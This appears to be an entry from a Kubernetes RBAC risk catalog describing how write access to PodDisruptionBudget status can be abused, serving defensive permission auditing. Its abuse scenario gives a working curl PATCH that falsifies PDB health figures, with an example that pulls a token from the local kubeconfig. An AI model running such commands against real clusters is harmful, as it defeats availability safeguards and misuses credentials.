Update PodDisruptionBudget Status (Namespace Tampering/DoS)
Tampering
Medium
Overview
| Field | Value |
|---|---|
| ID | 1094 |
| Name | Update PodDisruptionBudget Status (Namespace Tampering/DoS) |
| Risk Category | Tampering |
| Risk Level | Medium |
| Role Type | Role |
| API Groups | policy |
| Resources | poddisruptionbudgets/status |
| Verbs | create, update, patch |
| Tags | AvailabilityImpact DenialOfService Tampering |
Description
Allows creating or updating the status of PodDisruptionBudget (PDB) objects within a namespace. This could be used to misrepresent the health or disruption allowance of workloads, potentially leading to unintended disruptions or bypassing availability safeguards.
Abuse Scenarios
- Patch a PodDisruptionBudget’s status to misrepresent its health or allowed disruptions.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -X PATCH \
--data '{"status":{"currentHealthy":0,"desiredHealthy":1,"disruptionsAllowed":0,"expectedPods":1}}' \
https://<kubernetes-api-server>/apis/policy/v1/namespaces/<namespace>/poddisruptionbudgets/<pdb-name>/status
# Example: curl -k -H "Authorization: Bearer $(cat ~/.kube/config | grep token: | awk '{print $2}')" -H "Content-Type: application/json" -X PATCH --data '{"status":{"currentHealthy":0,"desiredHealthy":1,"disruptionsAllowed":0,"expectedPods":1}}' https://127.0.0.1:6443/apis/policy/v1/namespaces/default/poddisruptionbudgets/my-pdb/status